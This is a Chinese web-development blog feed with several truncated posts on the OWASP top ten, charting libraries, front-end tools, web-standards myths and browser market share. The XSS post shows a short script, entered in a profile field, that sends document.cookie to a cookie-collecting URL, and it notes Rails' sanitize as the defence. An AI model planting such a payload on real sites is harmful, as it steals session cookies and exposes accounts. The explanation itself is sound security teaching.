owasp.org列出十大Web应用漏洞清单:
1, Cross Site Scripting(XSS)
2, Injection Flaws
3, Malicious File Execution
4, Insecure Direct Object Reference
5, Cross Site Request Forgery(CSRF)
6, Information Leakage and Improper Error Handling
7, Broken Authentication and Session Management
8, Insecure Cryptographic Storage
9, Insecure Communications
10, Failure to Restrict URL Access
XSS排在第一位,MySpace著名的漏洞案就是由于受到XSS攻击,原理很简单,在用户提交的数据中包含JavaScript脚本
例如在修改用户Profile时用户在一个输入框内输入如下内容:
Java代码
<script>
$.ajax(“some url” + document.cookie)
</script>
这样当其他人(如管理员)查看该用户的Profile时,上面这段JavaScript执行,然后将管理员的cookie发送给某个url(可以是一个收集cookie的站点)
这样,管理员的登录认证等信息就暴露了!
而Rails提供了TextHelper#sanitize方法来预防XSS攻击
Tags: web
新闻来源:blogof.francescomugnai.com在 Web 中嵌入图形图表的技术越来越丰富,我们可以选择 JavaScript 库,CSS,Flash,Silverlight,PHP 库,服务器端的组件,也可以选择 Google Chart API 这样的 Web 服务。本文介绍了25个在 Web 中嵌入图形图表的免费资源。
JS Charts (基于 JavaScript 的图表生成工具) Protovis (可视化 javaScript 图表生成工具) Visifire (基于 Silverlight 和 WPF 的开源图表组件) pChart (PHP图表类库框架) Ejschart (Javascript) XML/SWF Charts Chronoscope (开源) Open Flash Chart 2 FusionCharts Free JFreeChart (flash) Flare (Flash ActionScript 库) Google Chart API Google Chart Generator Timeplot (基于 DHTML 的 AJAX 饰件) CSS Chart Generator (基于 CSS 的即时 Web 图表生成) YUI Library PlotKit [...]
Tags: web
文章来源http://www.williamlong.info/info/archives/262.html
一直觉得前端开发缺个手册,这是个体力活。不过总得有人来干。
今天闲来无事,把一些工具(online和client的)、常用网 址、以及经验总结等罗列出来和大家分享下。这个标题起地大了点,肯定会有很多地方没列到,包括类目的分法也可能考虑不周,所以还请大家积极补充指正,可以 直接留言,也可以发邮件给我(sorrycc#gmail.com)。之所以加上“大众”两字,因为以下资源对于高手来说可能早就很熟悉了。
另外想提一句,工具是死的,好不好用得看你会不会用。比如Firefox、Fiddler等,除了显而易见的功能以外,都有一些小的技巧,掌握了可以让你事半功倍。
更新记录:
[20081025] 第一版
快捷导航:
在线工具集
常用Firefox插件
IE下的调试工具
参考手册
批处理工具
IDE及其他工具
Bookmarklet
前端开发者社区及权威网站
推荐订阅的博客和网站
另外还搞了个Firefox插件《前端开发工具集》,把资源整合到一个菜单下,方便查询。数据放在线上(Google AppEngine),速度应该会有保证,更新也会比较方便哈。
在线工具集
书籍类:
Book Shelf 2.0 beta —— 荐,分类很清晰,下载很方便
Book Go!
原版图书免费下载链接收集站
51CNNET.NET
JavaScript类:
Beautify JavaScript —— JavaScript格式化工具,效果很理想
AJAX Libraries API
Regex Tester
Compressor Packer —— 以前一直用这个压JS,自从有了TBCompressor,就放弃他了
CSS类:
CSS选择器性能测试
CSSTidy —— CSS格式化工具
CSS Compressor —— CSS压缩
其他:
GUID 生成器 —— 做某些东西(Firefox插件)时需要唯一资源标志符时用
W3Counter
WebWait – Benchmark Your Website
常用Firefox插件
支付宝安全控件 和 旺旺协议 —— 网购专用,Firefox+浦发网银,无敌了
Firebug —— 这个不用介绍了吧,附空帏的外部编辑器乱码修正版
Firecooike —— 支持Cookie的查看和编辑
Jiffy —— 调试性能的,用起来比较麻烦,没试过
YSlow —— Why Slow? YUI出品
Pixel Perfect —— 把设计稿直接拖到Firefox里进行对比
Rainbow for Firebug —— JS高亮,性能不是很理想
Fiddler 开关 —— 简化在Firefox里切换Fiddler的操作,感谢Taobao [...]
Tags: web
这是在 CSS Globe 上看到的一篇文章,个人感觉对理解 Web 标准和 Web 开发(尤其是前端开发)很有启发意义,特翻译分享,并加入了一些我的想法。原文地址:5 Most Common Web Standards Misconceptions。
当开始学习 Web 标准的时候,我们会听到很多关于 Web 标准的理论,这些理论不一定都是正确的,有些反而可能会误导我们。下面是一些最常见的误解。
1、Web 标准 = Validation(验证)
W3C 提供的 XHTML 标记验证和 CSS 验证对学习 Web 标准和 Web 开发是很重要的,它不但能够指出代码中的错误,还能让我们学会怎样去改正错误。但是,仅仅通过验证并不意味着你的页面符合 Web 标准。我曾经把 W3C 的验证服务和英语拼写检查工具做过比较。如果你在拼写检查工具中输入这样一个句子:
Dog fox brown lazy over jump.
拼写检查工具并不会发现任何错误,因为单词拼写全是正确的。但是,这句话有意义吗?当你没有为你的页面逻辑结构使用合适的 HTML 元素时,不正和上面的那个例子一样吗?机器就是机器,它可以检测出你的语法、属性、嵌套等的正误,但是它无法了解你要表达的内容的本质。这就是 Web 语义化(semantic)的重要性。
2、Web 标准 = CSS
CSS 是一种样式单,它是一个让页面看起来更加美观的(强大的)工具,而且,CSS 也是 Web 标准的一个重要部分。但是,看看那些基于表格布局,tr、td 等标记层层嵌套如同噩梦一般的页面,你会发现它们也在通过各种方法使用着 CSS,那么,这些页面符合 Web 标准吗?
Web 标准并不只是技术,当然更不只是 CSS,而是你怎样去使用它。一个相对标准的页面,即使剥离了 CSS,它仍然应该是可读的,层次结构清晰的。
3、Web 标准 = [...]
Tags: web
Web 设计师真的可以忽视 IE6 了吗?显然不能,使用 IE6 的仍大有人在。本文搜集了最新的 Web 浏览器,屏幕分辨率以及操作系统的分布数据,Web 设计师可以籍此对自己的设计做一调整,比如,1024 以下的屏幕真的很少了,如果硬要照顾这个分辨率,你会发现,一个 800 像素宽的页面在 1440 的屏幕上看上太古怪了。本文数据来自 Wikipedia (OS | Browser), Market Share 等媒体。
不同屏幕分辨率分布
可以看出,1024 以下的屏幕所占的比例已经很小了,其中,800×600 的屏幕只占 3.69%,所以,现在的 Web 设计师,除非做的是弹性页面设计,一般不会考虑 800 宽的屏幕,否则,800 像素宽的页面放在 1440 宽的屏幕上浏览实在是太不协调了。
其它屏幕尺寸占了 10.38%,我猜想,这 10.38% 中多数应该是移动浏览器,因为 Wap 一直没有真正发展起来,因此,单独针对移动浏览器进行设计也未必值得,Opera Mobile 这样的浏览器已经可以象桌面浏览器那样渲染网页,同样,那些基于代理渲染的浏览器更是和桌面的渲染结果没有什么区别,差别的只有屏幕尺寸,然而,移动设备的屏幕尺寸实在太小了,只能让它自己左右滚动吧。
值得一提的是 iPhone,鉴于它的流行,很多博客站点都推出 iPhone 版,WordPress 已经支持 iPhone,然而仅限于布局相对简单的博客类站点,普通的站点,在 320 像素的屏幕上是很难不用滚动条完成布局的。
浏览器分布
这是国外的数据,是不是有些意外,IE6 的市场占有率仍然如此之高(国内还要高),仅次于 Firefox,因此,那些愤愤然声称不再支持 IE6 的设计师是不明智的。
Firefox 居首是实至名归,Chrome,Safari,Opera 仍是小众,不过鉴于 Google 的能力,Chrome 会有大作为。
操作系统分布
操作系统分布没有什么悬念,Windows XP [...]
Tags: web
